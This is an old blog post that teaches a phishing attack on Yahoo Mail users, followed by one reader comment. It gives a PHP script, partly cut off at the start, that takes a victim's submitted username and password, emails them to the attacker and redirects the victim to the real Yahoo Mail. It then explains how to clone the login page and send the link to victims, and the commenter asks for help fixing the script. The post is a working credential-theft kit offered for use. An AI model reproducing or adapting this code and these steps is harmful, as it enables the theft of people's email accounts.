Yahoo Mail Hack

Posted by ghimau under
Wanna hack yahoo mail?

Hihihi.. yes you can.. but you dont have to hack yahoo's server, the only thing you need is some sort of social engineering attack (some might called phishing).

Ok.. let's move on..

1. Create a php file, with the following code. Then upload it, on your favourite web hosting. But be sure that your hosting supports PHP.


youre_email@your_domain.com";
$dari=$login."@yahoo.com";
$mesej="Email :".$login."@yahoo.com , passwordnya :".$passwd;
$subjek = "DMangsa baru.. hihihih : ".$login."@yahoo.com";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= 'From:'.$dari;
$kirim=mail($dari, $subjek, $mesej, $headers);
if($kirim)
{ header("location:http://mail.yahoo.com");
}
else { header("location:login.htm");
}
?>


2. Download the yahoo mail login page. Change the action= to your newly php file.

3. Send a link to your victim.

4. Just hope that he/she logs in, and you'll get a email automatically with the victim's username and password

1 comments:

On 1 April 2008 at 04:27 , Anonymous said...

ghimau tahnks for the code, but i feel there is somethng missin in the start, it directly opens the php page and everyone then can see the code. can u plesae help me out with it... please